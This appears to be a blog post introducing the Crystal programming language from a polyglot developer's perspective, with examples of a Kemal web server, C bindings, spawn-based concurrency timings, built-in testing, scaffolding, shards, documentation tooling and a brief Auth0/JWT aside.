Crystal is a statically-typed, compiled, systems programming language with the aims of being as fast as c/c++, while having a syntax as readable as Ruby. This article is an introduction to the Crystal Language, through the eyes of a polyglot programmer. Being a former programmer of both C and Ruby, I have been able to explore the ins-and-outs of Crystal with an objective mindset and give an unbiased opinion on its features; from it's low-level primitives to its familiar syntax, and much in-between. I first came across Crystal when I saw @sferik giving a talk on it in Poland back in 2015. Video here. It was a great talk, and sparked my interest to Crystal right there and then. When I initially checked out Crystal, I thought it looked awesome but I was too busy with all the other languages I was using on a daily basis to be able to focus my time properly on it. Alongside being too busy, I couldn't really see why I'd use Crystal instead of using C/Erlang/Go/Ruby - languages that I already knew. What I can say with confidence now though; is that whilst those languages may all be able to achieve the same end-goal they're all better in their own, different ways entirely. When I want to build distributed apps, like my Fist/Bump Heartbeat Monitor - I use Erlang/Elixir. When I want to build an API backend I use Golang. When I want to spend the day with my brains scattered, and most probably in tears - I use C. For readibility and demonstrations, I use Ruby. When it comes to writing low-level systems such as daemons and obtuse Kernels, while it would be most performant to turn to C - it'd also take me a LONG time to achieve relatively little and the aforementioned tears would be very-likely flowing. This is where Crystal comes in. Having a syntax very similar to Ruby means that the familiarity of Crystal is incredibly enticing. Since the world is obsessed with web apps now, let's take a look at the code required to build a minimal web server in both Crystal and Ruby. In Ruby, using Sinatra, the code is as follows: require "sinatra" set :logging, false get "/" do content_type "text/plain" "Hello, Auth0!" end Now in Crystal, check out the equivalent code: require "kemal" logging false get "/" do |ctx| ctx.response.content_type = "text/plain" "Hello, Auth0!" end Kemal.run The fact that you can use Ruby syntax highlighting natively for Crystal says everything! Coming from Ruby to Crystal is a remarkably easy adaptation. The fact is; one copy and paste code from Ruby to Crystal and 90% of the time it will run with no errors. The creators of Crystal understand that Ruby is undoubtedly the most visually appealing language, and therefore built Crystal to take as much influence as possible from a design perspective. You can even run Crystal programs using the Ruby shell command and vice versa since the syntax is valid for both languages! Binding C One of the big selling points for Crystal is the ease with which you can interface with C libraries. "Crystal allows you to bind to existing C libraries without writing a single line in C. Additionally, it provides some conveniences like out and to_unsafe so writing bindings is as painless as possible." Let's build a simple script in C that says "hi!". We'll then write a Crystal app to bind to our C library. This is a great starting point for anyone who wants to know about binding C in Crystal. First off, let's create a project with Crystal's scaffolding tool (I'll cover this feature later). Run: $ crystal init app sayhi_c Then head into the directory sayhi_c/src/sayhi_c and let's create a file sayhi.c with the following contents: #include <stdio.h> void hi(const char * name){ printf("Hi %s!\n", name); } Now we need to compile our C file into an object. On Ubuntu or Mac using gcc we can run: $ gcc -c sayhi.c -o sayhi.o Using the -o flags allow us to create an Object filetype. Once we've got our Object file, we can bind it from within our Crystal app. Open up our sayhi_c.cr file, and have it reflect the following: require "./sayhi_c/*" @[Link(ldflags: "#{__DIR__}/sayhi_c/sayhi.o")] lib Say fun hi(name : LibC::Char*) : Void end Say.hi("Auth0") I'll mention now that there are no implicit type conversions except to_unsafe - explained here when invoking a C function: you must pass the exact type that is expected. Also worth noting at this point is that since we have built our C file into an object file, we can include it in the project directory and link from there. When we want to link dynamic libraries or installed C packages, we can just link them without including a path. So, if we build our project file and run it, we get the following: $ crystal build --release src/sayhi_c.cr $ ./sayhi_c > Hi Auth0! It's really easy to bind to C in Crystal, and is definitely one of the features that attracts me most to the language. I'm really looking forward to writing a C binding for a useful library and being able to utilise this functionality in production! Concurrency Primitives One of my favourite parts of Golang is the goroutine threading system. Working in the Database industry, I got a real passion for concurrency & parallelism and when looking to a new language, one of the first things I explore are the concurrency primitives. In Crystal, we can use the Spawn functionality in a very similar way to Goroutines in Golang, core.async in Clojure, or the lightweight threading in Elixir/Erlang. For a simple test, I wrote two quick scripts to test the Spawn functionality in Crystal alongside Ruby. We all know that Ruby is not a great language for threading, so I'm interested to see how much better Crystal is in small experiments. Let's take the following example in Ruby: 1000.times.map do Thread.new do puts "Hello?" end end.each(&:join) Running this from terminal I got the following results: $ time ruby spawntest.rb real 0m0.288s user 0m0.132s sys 0m0.116s I ran this little script on one of my ancient laptops that runs only 2gb of RAM and a terrible, terrible processor. Now, porting this script to Crystal, we can write: channel = Channel(String).new 1000.times do spawn { channel.send "Hello?" } puts channel.receive end Running this script with the crystal command, I got the following results: $ time crystal spawntest.cr real 0m1.129s user 0m0.952s sys 0m0.276s Hmmmm, very interesting indeed! Well, seen as Crystal is a compiled language and meant to be used to build small binaries that are easily distributed, it'd be a good idea to compile this small script and use that data instead! I compiled the script using the --release flag - this tells the Crystal compiler to optimise the bytecode. $ crystal build --release spawntest.cr $ time ./spawntest real 0m0.008s user 0m0.004s sys 0m0.000s As you can see, this result is markedly different. Using the --release flag when building the Crystal executable cuts out a lot of bloating and optimises the executable to be as efficient as possible. Obviously, the above test is a very naive use of the Spawn functionality, and unfortunately, I haven't had the opportunity to test in a load-heavy production environment. But soon I fully intend to, and I'll write another article benchmarking this in detail when I have a good usecase and get the chance to! Built-in Tooling in Crystal One of the things I like most about Crystal is the excellent built-in tooling available. When I look at new languages, especially relatively immature languages; it's always very reassuring when the language has extensive built-in tooling available to help developers stay productive & happy! In Crystal, there are a bunch of tools that make hacking around in the language super fun, but also help us to stay on the right track with semantics etc. Testing If you're coming from a Ruby/Rails background, I think you'll be very happy with the built-in testing framework that ships with Crystal. It's rather reminiscent of RSpec, and will be really easy to use for anyone coming from a similar background. Even if you're not from a Ruby/Rails background, it's a great testing tool and is super effective. Using the Greeter demo app from the Crystal docs, we could write our Specs as follows: require "spec" require "../lib/greeter" # demo greeter class describe Greeter do describe "#shout" do it "returns upcased string" do Greeter.new.shout('hello auth0').should eq "HELLO AUTH0" end end describe ".hello" do it "returns a static Hello string" do Greeter.hello.should eq "Hello" end end end As you can see, this spec should look very familiar to any Rubyists, and is becoming the more preferred syntax for application testing across many languages - there being RSpec clone libraries across most languages now! Project Scaffold Much the same as Elixir having the Mix manager, and Erlang the Rebar manager, Crystal has it's own built-in project scaffolder & package manager. I'd recommend using this at all times to ensure sematics are followed. We can use it with the following: $ crystal init lib my_cool_lib create my_cool_lib/.gitignore create my_cool_lib/LICENSE create my_cool_lib/README.md create my_cool_lib/.travis.yml create my_cool_lib/shard.yml create my_cool_lib/src/my_cool_lib.cr create my_cool_lib/src/my_cool_lib/version.cr create my_cool_lib/spec/spec_helper.cr create my_cool_lib/spec/my_cool_lib_spec.cr Initialized empty Git repository in ~/my_cool_lib/.git/ Sharding No - not creating Database Shards (luckily)! Shards are Crystal's packages distributed in the same way as Ruby Gems, Elixir Libs or Golang packages. Each application we create contains a file in the root directory named shard.yml. This file contains project details and external dependencies. The shard.yml file in my sayhi_c app above looks like this: name: sayhi_c version: 0.1.0 authors: - Robin Percy <robin@percy.pw> targets: sayhi_c: main: src/sayhi_c.cr crystal: 0.22.0 license: MIT The app I built has no dependencies to use, but if we want to include external packages we can do so by adding them at the bottom of the file: dependencies: github: github: felipeelias/crystal-github version: ~> 0.1.0 Documentation & Formatting Crystal has a great built-in tool for generating documentation and formatting files. The documentation that is generated is excellent - built-in html/css and almost instantly ready to deploy. To generate documentation, from the project root directory we can simply run: $ crystal doc This will create a docs directory, with a doc/index.html entry point. All files inside the root src directory of the project from which we ran the command will be considered. Alongside this, the built-in Formatter tool is a great feature of the language. We can run the formatter over our project by running: $ crystal tool format We can use this tool to unify code styles and to submit documentation improvements to Crystal itself. The formatter is also very fast, so very little time is lost if you format the entire project's codebase instead of just a single file. Both of these features are very cool, and highly useful! What I don't like Like anything in this world, Crystal can't possibly be perfect! There are two very small issues that I find with it... As a Polyglot programmer, I've had to learn a bunch of different programming paradigms. While this isn't a fault in Crystal, the fact that it's object orientated is pretty much the only thing I'm not too keen on in Crystal. Other than that; being a relatively young & immature language, there's often a lack of documentation available when you want to do something incredibly specific. Seeing this as an opportunity instead of a foible - it's actually kind of cool, because this means we can write documentation ourselves and hack sample apps together to become early adopters and decent contributors in the Crystal community! Aside - Auth0 & JWTs in Crystal Update: - I have written about securing a Crystal web app with Auth0 & JWT's here. At the moment, there is no Crystal-Auth0 library to use for end-to-end application securing. However, there is a JWT library available for Crystal already here. One thing to note here is that the Crystal-JWT library does not yet support the RS256 algorithm, which is the preffered algorithm and only supports the HS256 algorithm. When setting up your application in the Auth0 control panel, make sure to select the HS256 algorithm to reflect this. In my next series of articles, I will be writing specifically about using Auth0 in a NON-jwt context, and I'll make sure I demonstrate this in Crystal! Of course, if you're looking to secure a Crystal-based web app, you can always simply use the Auth0 Centralised Login. The Centralised Login will allow you to have immediate drop-in user management functionality. Conclusion I really rather like it! Although relatively immature, Crystal is a promising language with a growing Dev community surrounding it. In my previous article about Auth0 Lock / Iris Image Recognition, I mentioned the fact that it'd be better to use the pHash / Blockhash libraries for a production environment. If I was to build that system, I would most definitely use Crystal to bind to those C libraries. I know that I'd be getting fantastically close-to-C speeds, and with the ease and joy of writing Crystal! I am very much looking forward to seeing where this language goes. I think the adoption rate will rapidly increase and I'm excited to see startups using it in production systems. I am currently experimenting in building a Crystal library for the Auth0 API. I will write another article on building an API client in Crystal when I'm finished. I do hope this article has inspired you to give Crystal a try, and look forward to hearing your feedback if/when you do! If you need any help and want to ask questions, reach out to me via email and @rbin on twitter, I'm happy to help!
https://auth0.com/blog/an-introduction-to-crystal-lang/
CC-MAIN-2021-31
refinedweb
2,422
64.3
As we continue to leverage the benefits of automating test cases using Selenium, we see that it often becomes difficult to maintain them as our project grows. There would be instances when we use a specific web element at different points in your test script. For example, you might have to search for different test data for a test case, and we have to refer to the id or XPath of the search text field again and again. In such scenarios, you might find that your code is becoming duplicate, i.e., you are using the same piece of code to locate a web element again and again, often termed as redundancy. Additionally, if there is a change in such a locator, you will have to go through the entire code to make the necessary changes. Consequently, the Page Object Model comes to the rescue to simplify the project and make it easy to maintain and use. Subsequently, in this article, we will understand more about the Page Object Model design pattern. In addition to that, we will also know how to use it in Selenium to optimize test scripts. We will go through the below topics: - What is the Page Object Model (POM)? - Why do we need a Page Object Model? - What are the advantages of the Page Object Model? - How to implement the Page Object Model in Selenium? - How to define Page classes? - Also, how to define Test classes? - How does POM rescue in case of frequent locator changes? What is the Page Object Model(POM)? Page Object Model or POM is a design pattern or a framework that we use in Selenium using which one can create an object repository of the different web elements across the application. To simplify, in the Page Object Model framework, we create a class file for each web page. This class file consists of different web elements present on the web page. Moreover, the test scripts then use these elements to perform different actions. Since each page's web elements are in a separate class file, the code becomes easy to maintain and reduces code duplicity. The below diagram shows a simple project structure implementing POM- As you can see, we create different classes for the multiple pages and then save the web elements on the pages in them. Correspondingly, we save the test cases under a different package, making clear segregation among the different aspects. Let's quickly understand why the need for the Page Object Model arose? Why do we need a Page Object Model? Selenium automation is not a tedious job. All you need to do is find the elements and perform actions on them. To understand its need, let us consider a simple use case: - Firstly, navigate to the Demo website. - Secondly, login into the store. - Thirdly, capture the dashboard title. - Finally, logout from the store. Note: We will be using the demo testing website for the examples in our post. Additionally, the code for the use case without using POM would look like below: package simple_Project; import org.openqa.selenium.By; import org.openqa.selenium.WebDriver; import org.openqa.selenium.chrome.ChromeDriver; public class Test_Without_POM { public static void main(String[] args) throws InterruptedException { //Instantiating chrome driver WebDriver driver = new ChromeDriver(); //Opening web application driver.get(" //Locating the Login button and clicking on it driver.findElement(By.id("login")).click(); //Locating the username & password and passing the credentials driver.findElement(By.id("userName")).sendKeys("gunjankaushik"); driver.findElement(By.id("password")).sendKeys("[email protected]"); //Click on the login button driver.findElement(By.id("login")).click(); //Print the web page heading System.out.println("The page title is : " +driver.findElement(By.xpath("//*[@id=\"app\"]//div[@class=\"main-header\"]")).getText()); //Click on Logout button driver.findElement(By.id("submit")).click(); //Close driver instance driver.quit(); } } As visible in the script, we locate each web element, like the login button, username, password field, etc. and then perform the corresponding action like click() or sendKeys(). It looks simple, but as the test suite grows, the code becomes complex and challenging to maintain. Subsequently, Learn more about Selenium SendKeys in-depth. The script maintenance becomes cumbersome as we might use the same web element at several test scripts. A small change in the element will lead to a change in all the scripts that use the web element. It takes a lot of time, and the chances of errors are high. The resolution to the above problem is by using the Page Object Model Framework or Page Object Model Design Pattern. Using POM, you will create an object repository, which you can refer to at various points in your test script. Now consider a scenario where I have to test login with different users. I will be reusing the same web elements again and again in my test script. If the locator value of the login button changes, I would have to change it at different locations, and I might miss out on changing in one place. Using the Page Object Model approach here would simplify code management and makes it more maintainable and reusable. What are the advantages of the Page Object Model? In the section above, we understood why a non-POM project could make our project difficult to maintain, making it a huge advantage of the POM. Below are some advantages of using the Page Object Model that highlights its efficiency: - Makes code maintainable- Since the test classes are separate from the classes containing the web elements and the operation on them, updating the code is very easy if any web element updates or a new one adds. - Makes code readable- User can easily read through the project and test scripts due to a fine line between the test classes and the different web pages. - And, makes code reusable- If multiple test scripts use the same web elements, then we need not write code to handle the web element in every test script. Placing it in a separate page class makes it reusable by making it accessible by any test script. How to implement the Page Object Model in Selenium? After understanding the Page Object Model's importance, we will now implement the Page Object Model for the use case that we considered above. Our Page Object Model project structure would look like below: We will be automating the same use case as used in the section above and understand the implementation incrementally. How to define Page classes? We will be working with the different pages first. We will store the web elements present on each page in the corresponding java class. HomePage.java The home page of the dummy website looks like below, and the highlighted element is the one that we store in our HomePage.java class. Create a java class for Home Page. This class will contain web elements present on Home Page like the Login button and the operations performed on these elements. package pages; import org.openqa.selenium.By; import org.openqa.selenium.WebDriver; public class HomePage { WebDriver driver; //Constructor that will be automatically called as soon as the object of the class is created public HomePage(WebDriver driver) { this.driver=driver; } //Locator for login button By LoginBtn = By.id("login"); //Method to click login button public void clickLogin() { driver.findElement(LoginBtn).click(); } } Let us now understand the code line-by-line to understand how the pages class contains the web elements. - Import Statement - org.openqa.selenium.By: The import statement the By class, whose methods help locate web elements on a page. - Next, a constructor public HomePage(WebDriver driver) is created, and WebDriver is passed as an argument. This constructor is called as soon as the object of the HomePage class is created. - The constructor contains a line of code, i.e., this.driver=driver: This keyword is used to initialize the local driver variable with the actual driver we will use in our test class. The actual driver is the one that we pass as an argument to the constructor. In simple words, when we create a HomePage object in the test class, we pass the driver(which is also initialized in the test class) as an argument to the class. Now the same driver is passed as an argument to the constructor. The locally declared driver in the HomePage class is then initialized with the test class's actual driver. Additionally, you can read more about this keyword and strengthen your understanding. - By LoginBtn = By.id("login") : An object of the By class is created, and is identified in the document using id. You can use any other locator as per your convenience to locate the web elements using By. You can refer to our article on Selenium Locators for more learning on locators. - A method is then created containing code to act (s) on the identified locator(s). - driver.findElement(LoginBtn) .click() : The findElement method is used to locate the Login button and the click() action is performed on the same. LoginPage.java The next page to work on is the Login page, which looks like below- After we click on Login from Home Page, we will be redirected to Login Page, where we will have to enter the username, password and hit the Login button. The LoginPage class will contain the web elements and the corresponding actions shown in the below code. package pages; import org.openqa.selenium.By; import org.openqa.selenium.WebDriver; public class LoginPage { WebDriver driver; //Constructor that will be automatically called as soon as the object of the class is created public LoginPage(WebDriver driver) { this.driver = driver; } //Locator for username field By uName = By.id("userName"); //Locator for password field By pswd = By.id("password"); //Locator for login button By loginBtn = By.id("login"); //Method to enter username public void enterUsername(String user) { driver.findElement(uName).sendKeys(user); } //Method to enter password public void enterPassword(String pass) { driver.findElement(pswd).sendKeys(pass); } //Method to click on Login button public void clickLogin() { driver.findElement(loginBtn).click(); } } The initial part of the code would be the same for all the page classes, i.e., the constructor to initialize the actual driver. - By uName = By.id("userName") , By pswd = By.id("password") and By loginBtn = By.id("login") : The web element locators for the username field, password field and login button are stored in the uName, pswd and loginBtn respectively using the By class. - Methods corresponding to each of the web element actions are created that contain code for the web elements' actions. - Enter username in the username field- public void enterUsername(String user): The method accepts a String value for the username, which is passed to the sendKeys method by code driver.findElement(uName) .sendKeys(user) - Enter the password in the password field- public void enterPassword(String pass): The method accepts a String value for the username, which is passed to the sendKeys method by code driver.findElement(pswd) .sendKeys(pass) - Click on the Login button- public void clickLogin() : The method has no argument and the code in it, ie driver.findElement(loginBtn) .click() is used to click on the login button Dashboard.java The last page in our example is the Dashboard after logging in. It will look like below- Once we log in, we will capture the page heading and locate the Logout button to log out of the application."); //Method to capture the page heading public String getHeading() { String head = driver.findElement(heading).getText(); return head; } //Method to click on Logout button public void clickLogout() { driver.findElement(logoutBtn).click(); } } As we have already understood the use of constructor in the above two page classes, let's see the next lines of code. - By heading = By.xpath("//div[@class="main-header"]") and By logoutBtn = By.id("submit") : The By class locates the heading we seek on the web page using the xpath and the logout button using the id. - Next, create a method, public String getHeading() to retrieve the text from the heading web element. We use the return type of the method as String, which returns the heading retrieved using the getText() method. - We create a method, public void clickLogout() to click on the logout button using the click() method. How to define Test classes? After creating the required classes for the different pages, we will now create a test class with execution steps. These steps would reference the object repository created for different page elements. Let us quickly have a look at the code and then understand it step-by-step.", "---Exact path to("---Your Username---"); login.enterPassword("---Your Password---"); //Click on login button login.clickLogin(); Thread.sleep(3000); //Capture the page heading and print on console System.out.println("The page heading is --- " +dashboard.getHeading()); //Click on Logout button dashboard.clickLogout(); //Close browser instance driver.quit(); } } Let us now understand the test case code line by line. - System.setProperty("webdriver.chrome.driver", "---Exact path to chromedriver.exe---") : We set up the System properties to locate the chromdriver.exe in our local system. - WebDriver driver = new ChromeDriver() : Chrome driver instantiates using an object of WebDriver class. - driver.get(" : Using the webdriver get() method we navigate to the test URL. - Next we will create objects of all the three page classes that we have created, HomePage home = new HomePage(driver); , LoginPage login = new LoginPage(driver); and Dashboard dashboard = new Dashboard(driver); . As discussed in the first-page class about constructors, the argument passes during each class's object creation. This driver is the actual driver that will initialize the driver in the page class. - After creating the objects of each class, we can now easily reference any method with the class. We will now execute our test steps. - home.clickLogin() : By using the object of HomePage class we are referring the clickLogin() method. - Once we have reached the Login page, we use the object of Login class to use the enterUsername("your username"), enterPassword("your password"), and clickLogin() methods. Note that you can create your own username and password and then pass them as method arguments. - Next, we will capture the page heading and click on the logout using the Dashboard class object. We will access the getHeading() and clickLogout() methods. - After performing all the actions, we close the browser instance by using driver.quit(). Now that we have created the multiple page classes required to execute our test case and understood the underlying code, we will now execute the test class and see the results. You will see that the web browser opens up with the test website, and subsequent test steps perform on running the test. The console displays the page heading as intended in our test step. How does POM rescue in case of frequent locator changes? Now, let me give you an example of how the Page Object Model framework comes to the rescue in making the code maintainable and avoid errors while making updates when there is a change in some locator value. Consider the below use case- - Navigate to the demo website - Login with a valid username & password and capture the page heading. - Logout from the session. - Now login with an invalid username & password and verify the URL. As is evident from the use case, we will be using the login text fields and the login button multiple times. First, we will see how our code would look like when we are not using the page object model design technique. package nonPOM; import org.openqa.selenium.By; import org.openqa.selenium.WebDriver; import org.openqa.selenium.chrome.ChromeDriver; public class Login { public static void main(String[] args) throws InterruptedException { System.setProperty("webdriver.chrome.driver", "D:\\Selenium\\drivers\\chromedriver.exe"); WebDriver driver = new ChromeDriver(); driver.manage().window().maximize(); driver.get(" //First test case for valid login //Finding the web elements and passing the values driver.findElement(By.id("userName")).sendKeys("gunjankaushik"); driver.findElement(By.id("password")).sendKeys("[email protected]"); driver.findElement(By.id("login")).click(); Thread.sleep(5000); //Capture the page heading and print on console System.out.println("The page heading is --- " +driver.findElement(By.xpath("//div[@class=\"main-header\"]")).getText()); //Logout from the session driver.findElement(By.id("submit")).click(); //Second test case for invalid login credentials driver.findElement(By.id("userName")).sendKeys("abdc"); driver.findElement(By.id("password")).sendKeys("Password"); driver.findElement(By.id("login")).click(); String expectedURL = " String actualURL = driver.getCurrentUrl(); if(actualURL.equalsIgnoreCase(expectedURL)) System.out.println("Test passed !!!!"); else System.out.println("Test failed"); //Closing browser session driver.quit(); } } Now suppose the locator for the login button changes. To make corrections to your test script, you will have to change the Login button locator at two places. That is to say, line number 19 and line number 33. Moreover, if we use the Page Object pattern in this scenario, we would only have to make the changes to the Login button locator in the page class for the login page. We don't have to make the change at every place where we use or refer to the login locator. Did you see how easy it was to segregate the page web elements using the Page Object Model and using them in our test case? You can now try out a practice problem to strengthen your understanding of the Page Object Model in Selenium. Practice Exercise Use Case - First, log in to the demo website. - Secondly, on the dashboard page, locate the search text field and enter a search string. - After that, print the search string on the console. Try out the above test steps by adding more web elements to the Dashboard page class. Moreover, you can also refer to the below-updated code of the Dashboard page class and the test class. Dashboard.java"); //Locators for search field and search button By searchField = By.id("searchBox"); By searchBtn = By.xpath("//*[@id=\"basic-addon2\"]"); //Method to capture the page heading public String getHeading() { String head = driver.findElement(heading).getText(); return head; } //Method to enter search string and display the same on console public void enterSearchStr(String str) { driver.findElement(searchField).sendKeys(str); System.out.println("The search string is : " +str); driver.findElement(searchBtn).click(); } //Method to click on Logout button public void clickLogout() { driver.findElement(logoutBtn).click(); } } Test Case Class", "D:\\Selenium\\drivers\("gunjankaushik"); login.enterPassword("[email protected]"); //Click on login button login.clickLogin(); Thread.sleep(3000); //Capture the page heading and print on console System.out.println("The page heading is --- " +dashboard.getHeading()); //Perform search and display search string on console dashboard.enterSearchStr("java"); //CLick on Logout button dashboard.clickLogout(); } } Key Takeaways - We understood what the Page Object Model design pattern is and how it enhances our test scripts. - In addition to that, we saw the various advantages of using a Page Object Model Framework over a regular approach. Especially its benefit of improving code readability and reducing duplicates. - Moreover, we then saw how we could make our test framework efficient by using multiple page classes for the web application's different web pages. These page classes consist of the elements present on the corresponding pages and their relevant action methods. - Also, we created a test class that uses the objects created in the page classes. Additionally, it keeps the test script separate from the object repository.
https://www.toolsqa.com/selenium-webdriver/page-object-model/
CC-MAIN-2022-21
refinedweb
3,206
57.37
Hi guys i'm new to programming and i'm supposed to do a sum then average in which the output requests for four numbers from user then takes those #'s add them up and get the average then do a number of values in the array greater than the average is... I keep getting stuck on the formula portions and im pretty sure there will be more errors after that but right now i'm trying to get past these to errors. please help! Thanks! import java.util.Scanner; public class AverageArray { public static void main(String[] args) { final int TOTAL_NUMBERS = 4; int[] numbers = new int[TOTAL_NUMBERS]; float sum; //Create a Scanner Scanner input = new Scanner(System.in); //Read all numbers for (int i = 0; i < numbers.length; i++) { System.out.print("Enter a number:"); //Conver String into integer numbers[i] = input.nextInt(); } //Find the sum and average for (int i = 0; i < numbers.length; i++) float sum += numbers[i]; int average = float sum / TOTAL_NUMBERS; } //Find the average of the largest number int count = 0 for (int i = 0; i < numbers.length; i++) { if (numbers[i] == max) count++; } //Prepare the result String output = "The array is"; for (int i = 0; i < numbers.length; i ++) { output += numbers[i] + " "; } output += "n\The average is" + average; output += "n\The number of values in the array greater than the average" + "is" + count; //Display the result System.out.println(output); } } errors AverageArray.java:23: '.class' expected float sum += numbers[i]; ^ AverageArray.java:23: not a statement float sum += numbers[i]; ^
https://www.daniweb.com/programming/software-development/threads/229265/class-expected-and-not-a-statement-errors-for-getting-sum-and-average
CC-MAIN-2021-43
refinedweb
256
54.02
Back again, with another homework problem that is stumping me. Ok so assignment is to design 3 classes: Ship, Cruise Ship, and Cargo Ship. Ship should: member variable for name of ship (string) member variable for year ship was built (string) constructor and accessors and mutators virtual print that displays ship name and year it was build Cruise ship should: derived from Ship Class. member variable for max. # of passengers (int) constructor accessors and mutators. A print function that overrides the print function in the base class. cruise shop print function should display only the sip name and max # of passengers. Cargo Ship should: derived from ship class. member varialbe for cargo capcity in tonnage (int) constructon, accessors, and mutators. print function that overrides the print function in base class. should only print ship's name and capacity. demonstrate the classes in a program that has an array of ship points. array of elements should initialize with the addresses of dynamically allocated Ship, CruiseShip, and CargoShip objects. program should then step through the array, calling each object's print function. Heres my code so far: Ship Class (ship.h): #include <string> class Ship { private: string name; string year; public: Ship(); //Overloaded Constructor Ship(string n, string y) { name = n; year = y; } //Accessors string getName() {return name;} string getyear() {return year;} //Mutator that gets info from user virtual void setInfo() { string n; string y; cout <<"Please enter the ship name: "; cin >>n; cout <<"Please enter the year the ship was built: "; cin >>y; name = n; year = y; } //Print info for this function virtual void print() { cout <<"Ship"<<endl; cout <<"Name: "<<name<<endl <<"Year Built: "<<year<<endl; } }; CruiseShip.h code: #include<string> class CruiseShip : public Ship { private: int passengers; public: CruiseShip(); //Overloaded constructor that has inherited variables CruiseShip(string n, string y, int p): Ship(n,y) { passengers = p; } //Mutator that gets info from user virtual void setInfo() { int p; cout <<"Please enter the number of passengers: "; cin >>p; passengers = p; } //print function virtual void print() { cout <<"Cruise Ship"<<endl; cout <<"Name: "<<getName()<<endl <<"Maximum Passanger: "<<passengers<<endl; } };// end of CruiseShip CargoShip.h code: #include<string> class CargoShip : public Ship { int capacity; public: CargoShip(); //Overloaded constructor that has inherited variables CargoShip(string n, string y, int t):Ship(n,y) { capacity = t; } //Mutator that gets info from user virtual void setInfo() { int t; cout <<"Please enter the cargo capacity: "; cin >>t; capacity = t; } //Print info for this class virtual void print() { cout <<"Cargo Ship"<<endl; cout <<"Name: "<<getName()<<endl <<"Cargo Capacity: "<<capacity<<endl; } }; //end of CargoShip Main CPP; #include <iostream> #include <iomanip> #include <string> using namespace std; #include "ship.h" #include "cruiseShip.h" #include "cargoShip.h" const int SIZE = 3; int main() { Ship *ships[SIZE] = {new Ship(), new CruiseShip(), new CargoShip()}; int index; //Used with For loops for(index = 0; index < SIZE; index++) { *ships[index]->setInfo(); cout <<endl; } for(index = 0; index < SIZE; index++) { *ships[index]->print(); cout <<endl; } return 0; } The program will not compile. Error: Error 1 error C2100: illegal indirection Line: 17 Error 2 error C2100: illegal indirection Line 23 Any help would be great! Have been starring at this code for a few days now. Granted, much of the code is from the book examples and me trying to use it for the assignment way (as most students do). So please, if my intial code needs re-worked just say so. If you can help me just element the error and get the code to compile (corss fingers it works) THAT'D BE GREAT. Thanks in advance to anyone who replies with any help whatsoever. I appreicate your time and effort as this place seems to always have someone that can help.
https://www.daniweb.com/programming/software-development/threads/268427/inheritance-polymorphism-and-virtual-functions
CC-MAIN-2016-50
refinedweb
614
59.03
Set up the Django admin site The Django admin site provides a web based interface to access the database connected to a Django project. Even for experienced technical administrators, doing database CRUD (Create-Read-Update-Delete) operations directly on a database can be difficult and time consuming, given the need to issue raw SQL commands and navigate database structures. For non-technical users, doing database CRUD operations directly on a database can be daunting, if not impossible. The Django admin site fixes this problem. The Django admin site can expose all Django project related data structures linked to a database, so it's easy for experts and novices alike to perform database CRUD operations. As a Django project grows, the Django admin site can be a vital tool to administer the growing body of information in the database connected to a Django project. The Django admin site is built as a Django app, this means the only thing you need to do to set up the Django admin site is configure and install the app as any other Django app. If you're unfamiliar with the term Django app, read the previous section 'Set up content: Understand urls, templates and apps'. The Django admin site requires that you previously configure a database and also install the Django base tables. So if you still haven't done this, see the prior section 'Set up a database for a Django project'. Configure and install the Django admin site app By default, the Django admin is enabled on all Django projects. If you open a Django project's urls.py file, in the urlpatterns variable you'll see the line path('admin/', admin.site.urls). This last path definition tells Django to enable the admin site app on the /admin/ url directory (e.g.). Next, if you open the project's settings.py file and go to the INSTALLED_APPS variable. Near the top of this variable you'll also see the line django.contrib.admin which indicates the Django admin site app is enabled. Start the development web server by executing python manage.py runserver on Django's BASE_DIR. Open a browser on the Django admin site. You'll see a login screen like the one in Figure 1-5. Figure 1-5. Django admin site login Next, let's create a Django superuser or administrator to access the Django admin via the interface in Figure 1-5. To create a Django superuser you can use the createsuperuser command from manage.py as illustrated in listing 1-23. Listing 1-23. Create Django superuser for admin interface [user@coffeehouse ~]$ python manage.py createsuperuser Username (leave blank to use 'admin'): Email address: admin@coffeehouse.com Password: Password (again): The password is too similar to the email address. This password is too short. It must contain at least 8 characters. This password is too common. Bypass password validation and create user anyway? [y/N]: Password: Password (again): Superuser created successfully. Caution If you receive the error OperationalError - no such table: auth_user, this means the database for a Django project is still not setup properly. You'll need to run python manage.py migratein a project's BASE_DIR so Django creates the necessary tables to keep track of users. See the previous section 'Set up a database for a Django project' for more details. Tip By default, Django enforces user passwords comply with a minimum level of security. For example, in listing 1-23 you can see that after attempting to use the password coffee, Django rejects the assignment with a series of error messages and forces a new attempt. You can modify these password validation rules in the AUTH_PASSWORD_VALIDATORSvariable in a project's setttings.pyfile or as illustrated in listing 1-23 bypass this password validation. This last process creates a superuser whose information is stored in the database connected to the Django project, specifically in the auth_user table. Now you might be asking yourself, how do you update this user's name, password or email ? While you could go straight to the database table and perform updates, this is a tortuous route, a better approach is to rely on the Django admin which gives you a very friendly view into the database tables present in your Django project. Next, introduce the superuser username and password you just created into the interface from figure 1-5. Once you provide the superuser username and password on the admin site, you'll access the home page for the admin site illustrated in figure 1-6. Figure 1-6.- Django admin site home page On the home page of the Django admin site illustrated in figure 1-6, click on the 'Users' link. You'll see a list of users with access to the Django project. At the moment, you'll only see the superuser you created in the past step. You can change this user's credentials (e.g. password, email, username) or add new users directly from this Django admin site screen. This flexibility to modify or add records stored in a database that's tied to a Django project is what makes the Django admin site so powerful. For example, if you develop a coffeehouse project and add apps like stores, drinks or customers, Django admin authorized users can do CRUD operations on these objects (e.g. create stores, update drinks, delete customers). This is tremendously powerful from a content management point of view, particularly for non-technical users. And most importantly it requires little to no additional development work to enable the Django admin site on a project's apps. The Django admin site tasks presented here are just the 'tip of the iceberg' in functionality, a future chapter covers the Django admin site functionality in greater detail. Configure and install the Django admin site docs app The Django admin site also has its own documentation app. The Django admin site documentation app not only provides information about the operation of the admin site itself, but also includes other general documentation about Django filters for Django templates. More importantly, the Django admin site documentation app introspects the source code for all installed project apps to present documentation on controller methods and model objects (i.e. documentation embedded in the source code of app models.py and views.py files). To install the Django admin site documentation app you first need to install the docutils Python package with the pip package manager executing the following command: pip install docutils. Once you install the docutils package, you can proceed to install the Django admin site documentation app as any other Django app. First you must add the url to access the Django admin site documentation app. Open the project's urls.py file and add the following highlighted lines illustrated in listing 1-24: Listing 1-24. Add Django admin docs to admin interface from django.contrib import admin from django.urls import path, include from django.views.generic import TemplateView from coffeehouse.about import views as about_views urlpatterns = [ path('',TemplateView.as_view(template_name='homepage.html')), path('about/', about_views.contact), path('admin/doc/', include('django.contrib.admindocs.urls')), path('admin/', 